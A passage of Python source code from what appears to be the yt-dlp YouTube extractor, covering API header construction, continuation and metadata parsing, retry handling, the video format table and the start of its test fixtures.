session_index = int_or_none(try_get(ytcfg, lambda x: x['SESSION_INDEX']))
if session_index is not None:
return session_index
# Deprecated?
def _extract_identity_token(self, ytcfg=None, webpage=None):
if ytcfg:
token = try_get(ytcfg, lambda x: x['ID_TOKEN'], compat_str)
if token:
return token
if webpage:
return self._search_regex(
r'\bID_TOKEN["\']\s*:\s*["\'](.+?)["\']', webpage,
'identity token', default=None, fatal=False)
@staticmethod
def _extract_account_syncid(*args):
"""
Extract syncId required to download private playlists of secondary channels
@params response and/or ytcfg
"""
for data in args:
# ytcfg includes channel_syncid if on secondary channel
delegated_sid = try_get(data, lambda x: x['DELEGATED_SESSION_ID'], compat_str)
if delegated_sid:
return delegated_sid
sync_ids = (try_get(
data, (lambda x: x['responseContext']['mainAppWebResponseContext']['datasyncId'],
lambda x: x['DATASYNC_ID']), compat_str) or '').split('||')
if len(sync_ids) >= 2 and sync_ids[1]:
# datasyncid is of the form "channel_syncid||user_syncid" for secondary channel
# and just "user_syncid||" for primary channel. We only want the channel_syncid
return sync_ids[0]
@staticmethod
def _extract_visitor_data(*args):
"""
Extracts visitorData from an API response or ytcfg
Appears to be used to track session state
"""
return get_first(
args, [('VISITOR_DATA', ('INNERTUBE_CONTEXT', 'client', 'visitorData'), ('responseContext', 'visitorData'))],
expected_type=str)
@property
def is_authenticated(self):
return bool(self._generate_sapisidhash_header())
def extract_ytcfg(self, video_id, webpage):
if not webpage:
return {}
return self._parse_json(
self._search_regex(
r'ytcfg\.set\s*\(\s*({.+?})\s*\)\s*;', webpage, 'ytcfg',
default='{}'), video_id, fatal=False) or {}
def generate_api_headers(
self, *, ytcfg=None, account_syncid=None, session_index=None,
visitor_data=None, identity_token=None, api_hostname=None, default_client='web'):
origin = 'https://' + (api_hostname if api_hostname else self._get_innertube_host(default_client))
headers = {
'X-YouTube-Client-Name': compat_str(
self._ytcfg_get_safe(ytcfg, lambda x: x['INNERTUBE_CONTEXT_CLIENT_NAME'], default_client=default_client)),
'X-YouTube-Client-Version': self._extract_client_version(ytcfg, default_client),
'Origin': origin,
'X-Youtube-Identity-Token': identity_token or self._extract_identity_token(ytcfg),
'X-Goog-PageId': account_syncid or self._extract_account_syncid(ytcfg),
'X-Goog-Visitor-Id': visitor_data or self._extract_visitor_data(ytcfg)
}
if session_index is None:
session_index = self._extract_session_index(ytcfg)
if account_syncid or session_index is not None:
headers['X-Goog-AuthUser'] = session_index if session_index is not None else 0
auth = self._generate_sapisidhash_header(origin)
if auth is not None:
headers['Authorization'] = auth
headers['X-Origin'] = origin
return {h: v for h, v in headers.items() if v is not None}
@staticmethod
def _build_api_continuation_query(continuation, ctp=None):
query = {
'continuation': continuation
}
# TODO: Inconsistency with clickTrackingParams.
# Currently we have a fixed ctp contained within context (from ytcfg)
# and a ctp in root query for continuation.
if ctp:
query['clickTracking'] = {'clickTrackingParams': ctp}
return query
@classmethod
def _extract_next_continuation_data(cls, renderer):
next_continuation = try_get(
renderer, (lambda x: x['continuations'][0]['nextContinuationData'],
lambda x: x['continuation']['reloadContinuationData']), dict)
if not next_continuation:
return
continuation = next_continuation.get('continuation')
if not continuation:
return
ctp = next_continuation.get('clickTrackingParams')
return cls._build_api_continuation_query(continuation, ctp)
@classmethod
def _extract_continuation_ep_data(cls, continuation_ep: dict):
if isinstance(continuation_ep, dict):
continuation = try_get(
continuation_ep, lambda x: x['continuationCommand']['token'], compat_str)
if not continuation:
return
ctp = continuation_ep.get('clickTrackingParams')
return cls._build_api_continuation_query(continuation, ctp)
@classmethod
def _extract_continuation(cls, renderer):
next_continuation = cls._extract_next_continuation_data(renderer)
if next_continuation:
return next_continuation
contents = []
for key in ('contents', 'items'):
contents.extend(try_get(renderer, lambda x: x[key], list) or [])
for content in contents:
if not isinstance(content, dict):
continue
continuation_ep = try_get(
content, (lambda x: x['continuationItemRenderer']['continuationEndpoint'],
lambda x: x['continuationItemRenderer']['button']['buttonRenderer']['command']),
dict)
continuation = cls._extract_continuation_ep_data(continuation_ep)
if continuation:
return continuation
@classmethod
def _extract_alerts(cls, data):
for alert_dict in try_get(data, lambda x: x['alerts'], list) or []:
if not isinstance(alert_dict, dict):
continue
for alert in alert_dict.values():
alert_type = alert.get('type')
if not alert_type:
continue
message = cls._get_text(alert, 'text')
if message:
yield alert_type, message
def _report_alerts(self, alerts, expected=True, fatal=True, only_once=False):
errors = []
warnings = []
for alert_type, alert_message in alerts:
if alert_type.lower() == 'error' and fatal:
errors.append([alert_type, alert_message])
else:
warnings.append([alert_type, alert_message])
for alert_type, alert_message in (warnings + errors[:-1]):
self.report_warning('YouTube said: %s - %s' % (alert_type, alert_message), only_once=only_once)
if errors:
raise ExtractorError('YouTube said: %s' % errors[-1][1], expected=expected)
def _extract_and_report_alerts(self, data, *args, **kwargs):
return self._report_alerts(self._extract_alerts(data), *args, **kwargs)
def _extract_badges(self, renderer: dict):
badges = set()
for badge in try_get(renderer, lambda x: x['badges'], list) or []:
label = try_get(badge, lambda x: x['metadataBadgeRenderer']['label'], compat_str)
if label:
badges.add(label.lower())
return badges
@staticmethod
def _get_text(data, *path_list, max_runs=None):
for path in path_list or [None]:
if path is None:
obj = [data]
else:
obj = traverse_obj(data, path, default=[])
if not any(key is ... or isinstance(key, (list, tuple)) for key in variadic(path)):
obj = [obj]
for item in obj:
text = try_get(item, lambda x: x['simpleText'], compat_str)
if text:
return text
runs = try_get(item, lambda x: x['runs'], list) or []
if not runs and isinstance(item, list):
runs = item
runs = runs[:min(len(runs), max_runs or len(runs))]
text = ''.join(traverse_obj(runs, (..., 'text'), expected_type=str, default=[]))
if text:
return text
def _get_count(self, data, *path_list):
count_text = self._get_text(data, *path_list) or ''
count = parse_count(count_text)
if count is None:
count = str_to_int(
self._search_regex(r'^([\d,]+)', re.sub(r'\s', '', count_text), 'count', default=None))
return count
@staticmethod
def _extract_thumbnails(data, *path_list):
"""
Extract thumbnails from thumbnails dict
@param path_list: path list to level that contains 'thumbnails' key
"""
thumbnails = []
for path in path_list or [()]:
for thumbnail in traverse_obj(data, (*variadic(path), 'thumbnails', ...), default=[]):
thumbnail_url = url_or_none(thumbnail.get('url'))
if not thumbnail_url:
continue
# Sometimes youtube gives a wrong thumbnail URL. See:
# https://github.com/yt-dlp/yt-dlp/issues/233
# https://github.com/ytdl-org/youtube-dl/issues/28023
if 'maxresdefault' in thumbnail_url:
thumbnail_url = thumbnail_url.split('?')[0]
thumbnails.append({
'url': thumbnail_url,
'height': int_or_none(thumbnail.get('height')),
'width': int_or_none(thumbnail.get('width')),
})
return thumbnails
@staticmethod
def extract_relative_time(relative_time_text):
"""
Extracts a relative time from string and converts to dt object
e.g. 'streamed 6 days ago', '5 seconds ago (edited)', 'updated today'
"""
mobj = re.search(r'(?P<start>today|yesterday|now)|(?P<time>\d+)\s*(?P<unit>microsecond|second|minute|hour|day|week|month|year)s?\s*ago', relative_time_text)
if mobj:
start = mobj.group('start')
if start:
return datetime_from_str(start)
try:
return datetime_from_str('now-%s%s' % (mobj.group('time'), mobj.group('unit')))
except ValueError:
return None
def _extract_time_text(self, renderer, *path_list):
text = self._get_text(renderer, *path_list) or ''
dt = self.extract_relative_time(text)
timestamp = None
if isinstance(dt, datetime.datetime):
timestamp = calendar.timegm(dt.timetuple())
if timestamp is None:
timestamp = (
unified_timestamp(text) or unified_timestamp(
self._search_regex(
(r'([a-z]+\s*\d{1,2},?\s*20\d{2})', r'(?:.+|^)(?:live|premieres|ed|ing)(?:\s*(?:on|for))?\s*(.+\d)'),
text.lower(), 'time text', default=None)))
if text and timestamp is None:
self.report_warning(f"Cannot parse localized time text '{text}'" + bug_reports_message(), only_once=True)
return timestamp, text
def _extract_response(self, item_id, query, note='Downloading API JSON', headers=None,
ytcfg=None, check_get_keys=None, ep='browse', fatal=True, api_hostname=None,
default_client='web'):
response = None
last_error = None
count = -1
retries = self.get_param('extractor_retries', 3)
if check_get_keys is None:
check_get_keys = []
while count < retries:
count += 1
if last_error:
self.report_warning('%s. Retrying ...' % remove_end(last_error, '.'))
try:
response = self._call_api(
ep=ep, fatal=True, headers=headers,
video_id=item_id, query=query,
context=self._extract_context(ytcfg, default_client),
api_key=self._extract_api_key(ytcfg, default_client),
api_hostname=api_hostname, default_client=default_client,
note='%s%s' % (note, ' (retry #%d)' % count if count else ''))
except ExtractorError as e:
if isinstance(e.cause, network_exceptions):
if isinstance(e.cause, compat_HTTPError):
first_bytes = e.cause.read(512)
if not is_html(first_bytes):
yt_error = try_get(
self._parse_json(
self._webpage_read_content(e.cause, None, item_id, prefix=first_bytes) or '{}', item_id, fatal=False),
lambda x: x['error']['message'], compat_str)
if yt_error:
self._report_alerts([('ERROR', yt_error)], fatal=False)
# Downloading page may result in intermittent 5xx HTTP error
# Sometimes a 404 is also recieved. See: https://github.com/ytdl-org/youtube-dl/issues/28289
# We also want to catch all other network exceptions since errors in later pages can be troublesome
# See https://github.com/yt-dlp/yt-dlp/issues/507#issuecomment-880188210
if not isinstance(e.cause, compat_HTTPError) or e.cause.code not in (403, 429):
last_error = error_to_compat_str(e.cause or e.msg)
if count < retries:
continue
if fatal:
raise
else:
self.report_warning(error_to_compat_str(e))
return
else:
try:
self._extract_and_report_alerts(response, only_once=True)
except ExtractorError as e:
# YouTube servers may return errors we want to retry on in a 200 OK response
# See: https://github.com/yt-dlp/yt-dlp/issues/839
if 'unknown error' in e.msg.lower():
last_error = e.msg
continue
if fatal:
raise
self.report_warning(error_to_compat_str(e))
return
if not check_get_keys or dict_get(response, check_get_keys):
break
# Youtube sometimes sends incomplete data
# See: https://github.com/ytdl-org/youtube-dl/issues/28194
last_error = 'Incomplete data received'
if count >= retries:
if fatal:
raise ExtractorError(last_error)
else:
self.report_warning(last_error)
return
return response
@staticmethod
def is_music_url(url):
return re.match(r'https?://music\.youtube\.com/', url) is not None
def _extract_video(self, renderer):
video_id = renderer.get('videoId')
title = self._get_text(renderer, 'title')
description = self._get_text(renderer, 'descriptionSnippet')
duration = parse_duration(self._get_text(
renderer, 'lengthText', ('thumbnailOverlays', ..., 'thumbnailOverlayTimeStatusRenderer', 'text')))
if duration is None:
duration = parse_duration(self._search_regex(
r'(?i)(ago)(?!.*\1)\s+(?P<duration>[a-z0-9 ,]+?)(?:\s+[\d,]+\s+views)?(?:\s+-\s+play\s+short)?$',
traverse_obj(renderer, ('title', 'accessibility', 'accessibilityData', 'label'), default='', expected_type=str),
video_id, default=None, group='duration'))
view_count = self._get_count(renderer, 'viewCountText')
uploader = self._get_text(renderer, 'ownerText', 'shortBylineText')
channel_id = traverse_obj(
renderer, ('shortBylineText', 'runs', ..., 'navigationEndpoint', 'browseEndpoint', 'browseId'),
expected_type=str, get_all=False)
timestamp, time_text = self._extract_time_text(renderer, 'publishedTimeText')
scheduled_timestamp = str_to_int(traverse_obj(renderer, ('upcomingEventData', 'startTime'), get_all=False))
overlay_style = traverse_obj(
renderer, ('thumbnailOverlays', ..., 'thumbnailOverlayTimeStatusRenderer', 'style'),
get_all=False, expected_type=str)
badges = self._extract_badges(renderer)
thumbnails = self._extract_thumbnails(renderer, 'thumbnail')
navigation_url = urljoin('https://www.youtube.com/', traverse_obj(
renderer, ('navigationEndpoint', 'commandMetadata', 'webCommandMetadata', 'url'),
expected_type=str)) or ''
url = f'https://www.youtube.com/watch?v={video_id}'
if overlay_style == 'SHORTS' or '/shorts/' in navigation_url:
url = f'https://www.youtube.com/shorts/{video_id}'
return {
'_type': 'url',
'ie_key': YoutubeIE.ie_key(),
'id': video_id,
'url': url,
'title': title,
'description': description,
'duration': duration,
'view_count': view_count,
'uploader': uploader,
'channel_id': channel_id,
'thumbnails': thumbnails,
'upload_date': (strftime_or_none(timestamp, '%Y%m%d')
if self._configuration_arg('approximate_date', ie_key='youtubetab')
else None),
'live_status': ('is_upcoming' if scheduled_timestamp is not None
else 'was_live' if 'streamed' in time_text.lower()
else 'is_live' if overlay_style is not None and overlay_style == 'LIVE' or 'live now' in badges
else None),
'release_timestamp': scheduled_timestamp,
'availability': self._availability(needs_premium='premium' in badges, needs_subscription='members only' in badges)
}
class YoutubeIE(YoutubeBaseInfoExtractor):
IE_DESC = 'YouTube'
_VALID_URL = r"""(?x)^
(
(?:https?://|//) # http(s):// or protocol-independent URL
(?:(?:(?:(?:\w+\.)?[yY][oO][uU][tT][uU][bB][eE](?:-nocookie|kids)?\.com|
(?:www\.)?deturl\.com/www\.youtube\.com|
(?:www\.)?pwnyoutube\.com|
(?:www\.)?hooktube\.com|
(?:www\.)?yourepeat\.com|
tube\.majestyc\.net|
%(invidious)s|
youtube\.googleapis\.com)/ # the various hostnames, with wildcard subdomains
(?:.*?\#/)? # handle anchor (#/) redirect urls
(?: # the various things that can precede the ID:
(?:(?:v|embed|e|shorts)/(?!videoseries|live_stream)) # v/ or embed/ or e/ or shorts/
|(?: # or the v= param in all its forms
(?:(?:watch|movie)(?:_popup)?(?:\.php)?/?)? # preceding watch(_popup|.php) or nothing (like /?v=xxxx)
(?:\?|\#!?) # the params delimiter ? or # or #!
(?:.*?[&;])?? # any other preceding param (like /?s=tuff&v=xxxx or ?s=tuff&v=V36LpHqtcDY)
v=
)
))
|(?:
youtu\.be| # just youtu.be/xxxx
vid\.plus| # or vid.plus/xxxx
zwearz\.com/watch| # or zwearz.com/watch/xxxx
%(invidious)s
)/
|(?:www\.)?cleanvideosearch\.com/media/action/yt/watch\?videoId=
)
)? # all until now is optional -> you can pass the naked ID
(?P<id>[0-9A-Za-z_-]{11}) # here is it! the YouTube video ID
(?(1).+)? # if we found the ID, everything can follow
(?:\#|$)""" % {
'invidious': '|'.join(YoutubeBaseInfoExtractor._INVIDIOUS_SITES),
}
_PLAYER_INFO_RE = (
r'/s/player/(?P<id>[a-zA-Z0-9_-]{8,})/player',
r'/(?P<id>[a-zA-Z0-9_-]{8,})/player(?:_ias\.vflset(?:/[a-zA-Z]{2,3}_[a-zA-Z]{2,3})?|-plasma-ias-(?:phone|tablet)-[a-z]{2}_[A-Z]{2}\.vflset)/base\.js$',
r'\b(?P<id>vfl[a-zA-Z0-9_-]+)\b.*?\.js$',
)
_formats = {
'5': {'ext': 'flv', 'width': 400, 'height': 240, 'acodec': 'mp3', 'abr': 64, 'vcodec': 'h263'},
'6': {'ext': 'flv', 'width': 450, 'height': 270, 'acodec': 'mp3', 'abr': 64, 'vcodec': 'h263'},
'13': {'ext': '3gp', 'acodec': 'aac', 'vcodec': 'mp4v'},
'17': {'ext': '3gp', 'width': 176, 'height': 144, 'acodec': 'aac', 'abr': 24, 'vcodec': 'mp4v'},
'18': {'ext': 'mp4', 'width': 640, 'height': 360, 'acodec': 'aac', 'abr': 96, 'vcodec': 'h264'},
'22': {'ext': 'mp4', 'width': 1280, 'height': 720, 'acodec': 'aac', 'abr': 192, 'vcodec': 'h264'},
'34': {'ext': 'flv', 'width': 640, 'height': 360, 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264'},
'35': {'ext': 'flv', 'width': 854, 'height': 480, 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264'},
# itag 36 videos are either 320x180 (BaW_jenozKc) or 320x240 (__2ABJjxzNo), abr varies as well
'36': {'ext': '3gp', 'width': 320, 'acodec': 'aac', 'vcodec': 'mp4v'},
'37': {'ext': 'mp4', 'width': 1920, 'height': 1080, 'acodec': 'aac', 'abr': 192, 'vcodec': 'h264'},
'38': {'ext': 'mp4', 'width': 4096, 'height': 3072, 'acodec': 'aac', 'abr': 192, 'vcodec': 'h264'},
'43': {'ext': 'webm', 'width': 640, 'height': 360, 'acodec': 'vorbis', 'abr': 128, 'vcodec': 'vp8'},
'44': {'ext': 'webm', 'width': 854, 'height': 480, 'acodec': 'vorbis', 'abr': 128, 'vcodec': 'vp8'},
'45': {'ext': 'webm', 'width': 1280, 'height': 720, 'acodec': 'vorbis', 'abr': 192, 'vcodec': 'vp8'},
'46': {'ext': 'webm', 'width': 1920, 'height': 1080, 'acodec': 'vorbis', 'abr': 192, 'vcodec': 'vp8'},
'59': {'ext': 'mp4', 'width': 854, 'height': 480, 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264'},
'78': {'ext': 'mp4', 'width': 854, 'height': 480, 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264'},
# 3D videos
'82': {'ext': 'mp4', 'height': 360, 'format_note': '3D', 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264', 'preference': -20},
'83': {'ext': 'mp4', 'height': 480, 'format_note': '3D', 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264', 'preference': -20},
'84': {'ext': 'mp4', 'height': 720, 'format_note': '3D', 'acodec': 'aac', 'abr': 192, 'vcodec': 'h264', 'preference': -20},
'85': {'ext': 'mp4', 'height': 1080, 'format_note': '3D', 'acodec': 'aac', 'abr': 192, 'vcodec': 'h264', 'preference': -20},
'100': {'ext': 'webm', 'height': 360, 'format_note': '3D', 'acodec': 'vorbis', 'abr': 128, 'vcodec': 'vp8', 'preference': -20},
'101': {'ext': 'webm', 'height': 480, 'format_note': '3D', 'acodec': 'vorbis', 'abr': 192, 'vcodec': 'vp8', 'preference': -20},
'102': {'ext': 'webm', 'height': 720, 'format_note': '3D', 'acodec': 'vorbis', 'abr': 192, 'vcodec': 'vp8', 'preference': -20},
# Apple HTTP Live Streaming
'91': {'ext': 'mp4', 'height': 144, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 48, 'vcodec': 'h264', 'preference': -10},
'92': {'ext': 'mp4', 'height': 240, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 48, 'vcodec': 'h264', 'preference': -10},
'93': {'ext': 'mp4', 'height': 360, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264', 'preference': -10},
'94': {'ext': 'mp4', 'height': 480, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264', 'preference': -10},
'95': {'ext': 'mp4', 'height': 720, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 256, 'vcodec': 'h264', 'preference': -10},
'96': {'ext': 'mp4', 'height': 1080, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 256, 'vcodec': 'h264', 'preference': -10},
'132': {'ext': 'mp4', 'height': 240, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 48, 'vcodec': 'h264', 'preference': -10},
'151': {'ext': 'mp4', 'height': 72, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 24, 'vcodec': 'h264', 'preference': -10},
# DASH mp4 video
'133': {'ext': 'mp4', 'height': 240, 'format_note': 'DASH video', 'vcodec': 'h264'},
'134': {'ext': 'mp4', 'height': 360, 'format_note': 'DASH video', 'vcodec': 'h264'},
'135': {'ext': 'mp4', 'height': 480, 'format_note': 'DASH video', 'vcodec': 'h264'},
'136': {'ext': 'mp4', 'height': 720, 'format_note': 'DASH video', 'vcodec': 'h264'},
'137': {'ext': 'mp4', 'height': 1080, 'format_note': 'DASH video', 'vcodec': 'h264'},
'138': {'ext': 'mp4', 'format_note': 'DASH video', 'vcodec': 'h264'}, # Height can vary (https://github.com/ytdl-org/youtube-dl/issues/4559)
'160': {'ext': 'mp4', 'height': 144, 'format_note': 'DASH video', 'vcodec': 'h264'},
'212': {'ext': 'mp4', 'height': 480, 'format_note': 'DASH video', 'vcodec': 'h264'},
'264': {'ext': 'mp4', 'height': 1440, 'format_note': 'DASH video', 'vcodec': 'h264'},
'298': {'ext': 'mp4', 'height': 720, 'format_note': 'DASH video', 'vcodec': 'h264', 'fps': 60},
'299': {'ext': 'mp4', 'height': 1080, 'format_note': 'DASH video', 'vcodec': 'h264', 'fps': 60},
'266': {'ext': 'mp4', 'height': 2160, 'format_note': 'DASH video', 'vcodec': 'h264'},
# Dash mp4 audio
'139': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'aac', 'abr': 48, 'container': 'm4a_dash'},
'140': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'aac', 'abr': 128, 'container': 'm4a_dash'},
'141': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'aac', 'abr': 256, 'container': 'm4a_dash'},
'256': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'aac', 'container': 'm4a_dash'},
'258': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'aac', 'container': 'm4a_dash'},
'325': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'dtse', 'container': 'm4a_dash'},
'328': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'ec-3', 'container': 'm4a_dash'},
# Dash webm
'167': {'ext': 'webm', 'height': 360, 'width': 640, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp8'},
'168': {'ext': 'webm', 'height': 480, 'width': 854, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp8'},
'169': {'ext': 'webm', 'height': 720, 'width': 1280, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp8'},
'170': {'ext': 'webm', 'height': 1080, 'width': 1920, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp8'},
'218': {'ext': 'webm', 'height': 480, 'width': 854, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp8'},
'219': {'ext': 'webm', 'height': 480, 'width': 854, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp8'},
'278': {'ext': 'webm', 'height': 144, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp9'},
'242': {'ext': 'webm', 'height': 240, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'243': {'ext': 'webm', 'height': 360, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'244': {'ext': 'webm', 'height': 480, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'245': {'ext': 'webm', 'height': 480, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'246': {'ext': 'webm', 'height': 480, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'247': {'ext': 'webm', 'height': 720, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'248': {'ext': 'webm', 'height': 1080, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'271': {'ext': 'webm', 'height': 1440, 'format_note': 'DASH video', 'vcodec': 'vp9'},
# itag 272 videos are either 3840x2160 (e.g. RtoitU2A-3E) or 7680x4320 (sLprVF6d7Ug)
'272': {'ext': 'webm', 'height': 2160, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'302': {'ext': 'webm', 'height': 720, 'format_note': 'DASH video', 'vcodec': 'vp9', 'fps': 60},
'303': {'ext': 'webm', 'height': 1080, 'format_note': 'DASH video', 'vcodec': 'vp9', 'fps': 60},
'308': {'ext': 'webm', 'height': 1440, 'format_note': 'DASH video', 'vcodec': 'vp9', 'fps': 60},
'313': {'ext': 'webm', 'height': 2160, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'315': {'ext': 'webm', 'height': 2160, 'format_note': 'DASH video', 'vcodec': 'vp9', 'fps': 60},
# Dash webm audio
'171': {'ext': 'webm', 'acodec': 'vorbis', 'format_note': 'DASH audio', 'abr': 128},
'172': {'ext': 'webm', 'acodec': 'vorbis', 'format_note': 'DASH audio', 'abr': 256},
# Dash webm audio with opus inside
'249': {'ext': 'webm', 'format_note': 'DASH audio', 'acodec': 'opus', 'abr': 50},
'250': {'ext': 'webm', 'format_note': 'DASH audio', 'acodec': 'opus', 'abr': 70},
'251': {'ext': 'webm', 'format_note': 'DASH audio', 'acodec': 'opus', 'abr': 160},
# RTMP (unnamed)
'_rtmp': {'protocol': 'rtmp'},
# av01 video only formats sometimes served with "unknown" codecs
'394': {'ext': 'mp4', 'height': 144, 'format_note': 'DASH video', 'vcodec': 'av01.0.00M.08'},
'395': {'ext': 'mp4', 'height': 240, 'format_note': 'DASH video', 'vcodec': 'av01.0.00M.08'},
'396': {'ext': 'mp4', 'height': 360, 'format_note': 'DASH video', 'vcodec': 'av01.0.01M.08'},
'397': {'ext': 'mp4', 'height': 480, 'format_note': 'DASH video', 'vcodec': 'av01.0.04M.08'},
'398': {'ext': 'mp4', 'height': 720, 'format_note': 'DASH video', 'vcodec': 'av01.0.05M.08'},
'399': {'ext': 'mp4', 'height': 1080, 'format_note': 'DASH video', 'vcodec': 'av01.0.08M.08'},
'400': {'ext': 'mp4', 'height': 1440, 'format_note': 'DASH video', 'vcodec': 'av01.0.12M.08'},
'401': {'ext': 'mp4', 'height': 2160, 'format_note': 'DASH video', 'vcodec': 'av01.0.12M.08'},
}
_SUBTITLE_FORMATS = ('json3', 'srv1', 'srv2', 'srv3', 'ttml', 'vtt')
_GEO_BYPASS = False
IE_NAME = 'youtube'
_TESTS = [
{
'url': 'https://www.youtube.com/watch?v=BaW_jenozKc&t=1s&end=9',
'info_dict': {
'id': 'BaW_jenozKc',
'ext': 'mp4',
'title': 'youtube-dl test video "\'/\\ä↭𝕐',
'uploader': 'Philipp Hagemeister',
'uploader_id': 'phihag',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/phihag',
'channel': 'Philipp Hagemeister',
'channel_id': 'UCLqxVugv74EIW3VWh2NOa3Q',
'channel_url': r're:https?://(?:www\.)?youtube\.com/channel/UCLqxVugv74EIW3VWh2NOa3Q',
'upload_date': '20121002',
'description': 'md5:8fb536f4877b8a7455c2ec23794dbc22',
'categories': ['Science & Technology'],
'tags': ['youtube-dl'],
'duration': 10,
'view_count': int,
'like_count': int,
'availability': 'public',
'playable_in_embed': True,
'thumbnail': 'https://i.ytimg.com/vi/BaW_jenozKc/maxresdefault.jpg',
'live_status': 'not_live',
'age_limit': 0,
'start_time': 1,
'end_time': 9,
'channel_follower_count': int
}
},
{
'url': '//www.YouTube.com/watch?v=yZIXLfi8CZQ',
'note': 'Embed-only video (#1746)',
'info_dict': {
'id': 'yZIXLfi8CZQ',
'ext': 'mp4',
'upload_date': '20120608',
'title': 'Principal Sexually Assaults A Teacher - Episode 117 - 8th June 2012',
'description': 'md5:09b78bd971f1e3e289601dfba15ca4f7',
'uploader': 'SET India',
'uploader_id': 'setindia',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/setindia',
'age_limit': 18,
},
'skip': 'Private video',
},
{
'url': 'https://www.youtube.com/watch?v=BaW_jenozKc&v=yZIXLfi8CZQ',
'note': 'Use the first video ID in the URL',
'info_dict': {
'id': 'BaW_jenozKc',
'ext': 'mp4',
'title': 'youtube-dl test video "\'/\\ä↭𝕐',
'uploader': 'Philipp Hagemeister',
'uploader_id': 'phihag',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/phihag',
'channel': 'Philipp Hagemeister',
'channel_id': 'UCLqxVugv74EIW3VWh2NOa3Q',
'channel_url': r're:https?://(?:www\.)?youtube\.com/channel/UCLqxVugv74EIW3VWh2NOa3Q',
'upload_date': '20121002',
'description': 'md5:8fb536f4877b8a7455c2ec23794dbc22',
'categories': ['Science & Technology'],
'tags': ['youtube-dl'],
'duration': 10,
'view_count': int,
'like_count': int,
'availability': 'public',
'playable_in_embed': True,
'thumbnail': 'https://i.ytimg.com/vi/BaW_jenozKc/maxresdefault.jpg',
'live_status': 'not_live',
'age_limit': 0,
'channel_follower_count': int
},
'params': {
'skip_download': True,
},
},
{
'url': 'https://www.youtube.com/watch?v=a9LDPn-MO4I',
'note': '256k DASH audio (format 141) via DASH manifest',
'info_dict': {
'id': 'a9LDPn-MO4I',
'ext': 'm4a',
'upload_date': '20121002',
'uploader_id': '8KVIDEO',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/8KVIDEO',
'description': '',
'uploader': '8KVIDEO',
'title': 'UHDTV TEST 8K VIDEO.mp4'
},
'params': {
'youtube_include_dash_manifest': True,
'format': '141',
},
'skip': 'format 141 not served anymore',
},
# DASH manifest with encrypted signature
{
'url': 'https://www.youtube.com/watch?v=IB3lcPjvWLA',
'info_dict': {
'id': 'IB3lcPjvWLA',
'ext': 'm4a',
'title': 'Afrojack, Spree Wilson - The Spark (Official Music Video) ft. Spree Wilson',
'description': 'md5:8f5e2b82460520b619ccac1f509d43bf',
'duration': 244,
'uploader': 'AfrojackVEVO',
'uploader_id': 'AfrojackVEVO',
'upload_date': '20131011',
'abr': 129.495,
'like_count': int,
'channel_id': 'UChuZAo1RKL85gev3Eal9_zg',
'playable_in_embed': True,
'channel_url': 'https://www.youtube.com/channel/UChuZAo1RKL85gev3Eal9_zg',
'view_count': int,
'track': 'The Spark',
'live_status': 'not_live',
'thumbnail': 'https://i.ytimg.com/vi_webp/IB3lcPjvWLA/maxresdefault.webp',
'channel': 'Afrojack',
'uploader_url': 'http://www.youtube.com/user/AfrojackVEVO',
'tags': 'count:19',
'availability': 'public',
'categories': ['Music'],
'age_limit': 0,
'alt_title': 'The Spark',
'channel_follower_count': int
},
'params': {
'youtube_include_dash_manifest': True,
'format': '141/bestaudio[ext=m4a]',
},
},
# Age-gate videos. See https://github.com/yt-dlp/yt-dlp/pull/575#issuecomment-888837000
{
'note': 'Embed allowed age-gate video',
'url': 'https://youtube.com/watch?v=HtVdAasjOgU',
'info_dict': {
'id': 'HtVdAasjOgU',
'ext': 'mp4',
'title': 'The Witcher 3: Wild Hunt - The Sword Of Destiny Trailer',
'description': r're:(?s).{100,}About the Game\n.*?The Witcher 3: Wild Hunt.{100,}',
'duration': 142,
'uploader': 'The Witcher',
'uploader_id': 'WitcherGame',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/WitcherGame',
'upload_date': '20140605',
'age_limit': 18,
'categories': ['Gaming'],
'thumbnail': 'https://i.ytimg.com/vi_webp/HtVdAasjOgU/maxresdefault.webp',
'availability': 'needs_auth',
'channel_url': 'https://www.youtube.com/channel/UCzybXLxv08IApdjdN0mJhEg',
'like_count': int,
'channel': 'The Witcher',
'live_status': 'not_live',
'tags': 'count:17',
